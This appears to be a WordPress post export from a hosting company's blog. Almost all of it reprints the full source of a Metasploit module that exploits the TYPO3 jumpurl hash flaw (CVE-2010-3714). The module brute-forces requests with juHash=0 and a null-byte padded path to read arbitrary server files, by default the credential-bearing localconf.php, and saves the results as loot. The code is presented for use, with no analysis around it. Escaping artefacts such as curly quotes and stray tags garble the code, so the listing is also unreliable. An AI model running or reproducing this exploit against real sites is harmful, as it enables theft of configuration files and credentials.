##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report<\/p>\n
def initialize
super(
‘Name’ => ‘TYPO3 sa-2010-020 Remote File Disclosure’,
‘Description’ => %q{
This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.
Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.
This flaw can be used to read any file that the web server user account has access to view.
},
‘References’ => [
[‘CVE’, ‘2010-3714’],
[‘URL’, ‘http:\/\/typo3.org\/teams\/security\/security-bulletins\/typo3-sa-2010-020’],
[‘URL’, ‘http:\/\/gregorkopf.de\/slides_berlinsides_2010.pdf’],
],
‘Author’ => [
‘Chris John Riley’,
‘Gregor Kopf’, # Original Discovery
],
‘License’ => MSF_LICENSE
)<\/p>\n
register_options(
[
OptString.new(‘URI’, [true, ‘TYPO3 Path’, ‘\/’]),
OptString.new(‘RFILE’, [true, ‘The remote file to download’, ‘typo3conf\/localconf.php’]),
OptInt.new(‘MAX_TRIES’, [true, ‘Maximum tries’, 10000]),
])
end<\/p>\n
def run
# Add padding to bypass TYPO3 security filters
#
# Null byte fixed in PHP 5.3.4
#<\/p>\n
case datastore[‘RFILE’]when nil
# Nothing
when \/localconf\\.php$\/i
jumpurl = “#{datastore[‘RFILE’]}%00\/.”
when %r{^\\.\\.(\/|\\\\)}i
print_error(‘Directory traversal detected… you might want to start that with a \/.. or \\\\..’)
else
jumpurl = datastore[‘RFILE’].to_s
end<\/p>\n
print_status(“Establishing a connection to #{rhost}:#{rport}”)
print_status(“Trying to retrieve #{datastore[‘RFILE’]}”)<\/p>\n
location_base = Rex::Text.rand_text_numeric(1)
counter = 0<\/p>\n
queue = []print_status(‘Creating request queue’)<\/p>\n
1.upto(datastore[‘MAX_TRIES’]) do
counter += 1
locationData = “#{location_base}::#{counter}”
queue << “#{datastore[‘URI’]}\/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=0”
if ((counter.to_f \/ datastore[‘MAX_TRIES’].to_f) * 100.0).to_s =~ \/(25|50|75|100).0$\/ # Display percentage complete every 25%
percentage = (counter.to_f \/ datastore[‘MAX_TRIES’].to_f) * 100
print_status(“Queue #{percentage.to_i}% compiled – [#{counter} \/ #{datastore[‘MAX_TRIES’]}]”)
end
end<\/p>\n
print_status(‘Queue compiled. Beginning requests… grab a coffee!’)<\/p>\n
counter = 0
queue.each do |check|
counter += 1
check = check.sub(‘\/\/’, ‘\/’) # Prevent double \/\/ from appearing in uri
begin
file = send_request_raw({
‘uri’ => check,
‘method’ => ‘GET’,
‘headers’ =>
{
‘Connection’ => ‘Close’
}
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
return
rescue ::Timeout::Error, ::Errno::EPIPE => e
print_error(e.message)
return
end<\/p>\n
if file.nil?
print_error(‘Connection timed out’)
return
end<\/p>\n
if ((counter.to_f \/ queue.length.to_f) * 100.0).to_s =~ \/\\d0.0$\/ # Display percentage complete every 10%
percentage = (counter.to_f \/ queue.length.to_f) * 100.0
print_status(“Requests #{percentage.to_i}% complete – [#{counter} \/ #{queue.length}]”)
end<\/p>\n
# file can be nil
case file.headers[‘Content-Type’]when ‘text\/html’
case file.body
when ‘jumpurl Secure: “‘ + datastore[‘RFILE’] + ‘” was not a valid file!’
print_error(“File #{datastore[‘RFILE’]} does not exist.”)
return
when \/jumpurl Secure: locationData\/i
print_error(“File #{datastore[‘RFILE’]} is not accessible.”)
return
when ‘jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!’
print_error(“File #{datastore[‘RFILE’]} is not allowed to be accessed through jumpUrl.”)
return
end
when ‘application\/octet-stream’
addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
print_good(‘Found matching hash’)
print_good(‘Writing local file ‘ + File.basename(datastore[‘RFILE’].downcase) + ‘ to loot’)
store_loot(‘typo3_’ + File.basename(datastore[‘RFILE’].downcase), ‘text\/xml’, addr, file.body, ‘typo3_’ + File.basename(datastore[‘RFILE’].downcase), ‘Typo3_sa_2010_020’)
return
end
end<\/p>\n
print_error(“#{rhost}:#{rport} [Typo3-SA-2010-020] Failed to retrieve file #{datastore[‘RFILE’]}”)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Report def initializesuper(‘Name’ => ‘TYPO3 sa-2010-020 Remote File Disclosure’,‘Description’ => %q{This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.This flaw can …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59308","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59308"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59308\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}